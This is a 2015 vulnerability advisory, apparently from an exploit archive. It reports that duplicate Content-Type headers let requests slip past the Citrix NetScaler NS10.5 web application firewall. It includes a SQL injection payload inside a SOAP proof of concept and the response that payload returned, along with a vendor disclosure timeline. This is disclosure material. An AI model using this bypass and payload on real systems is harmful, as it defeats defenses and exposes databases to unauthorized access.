Citrix Netscaler NS10.5 - WAF Bypass (Via HTTP Header Pollution)







Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.


# Exploit Title: [Citrix Netscaler NS10.5 WAF Bypass via HTTP Header Pollution]
# Date: [Mar 13, 2015]
# Exploit Author: [BGA Security]
# Vendor Homepage: []
# Version: [NS10.5]
# Tested on: [NetScaler NS10.5: Build,]

Document Title:
Citrix Netscaler NS10.5 WAF Bypass via HTTP Header Pollution

Release Date:
12 Mar 2015

Product & Service Introduction:
Citrix NetScaler AppFirewall is a comprehensive application security solution that blocks known and unknown attacks targeting web and web services applications.

Abstract Advisory Information:
BGA Security Team discovered an HTTP Header Pollution
vulnerability in Citrix Netscaler NS10.5 (other versions may be vulnerable)

Vulnerability Disclosure Timeline:
2 Feb 2015	Bug reported to the vendor.
4 Feb 2015	Vendor returned with a case ID.
5 Feb 2015	Detailed info/config given.
12 Feb 2015	Asked about the case.
16 Feb 2015	Vendor returned "investigating ..."
6 Mar 2015	Asked about the case.
6 Mar 2015	Vendor has validated the issue.
12 Mar 2015	There aren't any fix addressing the issue.

Discovery Status:

Affected Product(s):
Citrix Systems, Inc.
Product: Citrix Netscaler NS10.5 (other versions may be vulnerable)

Exploitation Technique:
Remote, Unauthenticated

Severity Level:

Technical Details & Description:
It is possible to bypass Netscaler WAF using a method which may be called HTTP Header Pollution. The setup:

    An Apache web server with default configuration on Windows (XAMPP).
    A SOAP web service which has written in PHP and vulnerable to SQL injection.
    Netscaler WAF with SQL injection rules.

First request: ‘ union select current_user,2# - Netscaler blocks it.

Second request: The same content and an additional HTTP header which is “Content-Type: application/octet-stream”. - It bypasses the WAF but the web server misinterprets it.

Third request: The same content and two additional HTTP headers which are “Content-Type: application/octet-stream” and “Content-Type: text/xml” in that order. The request is able to bypass the WAF and the web server runs it.

Proof of Concept (PoC):
Proof of Concept


<soapenv:Envelope xmlns:soapenv="" xmlns:tem="">
      	<string>’ union select current_user, 2#</string> 


<soap:Envelope xmlns:soap="" xmlns:xsi="" xmlns:xsd="">
      <return xsi:type=“xsd:string”> Name: root@localhost </return>

Solution Fix & Patch:
12 Mar 2015	There aren't any fix addressing the issue.

Security Risk:
The risk of the vulnerability above estimated as high.

Credits & Authors:
BGA Bilgi Güvenliği - Onur ALANBEL

Disclaimer & Information:
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all  warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
Copyright © 2015 | BGA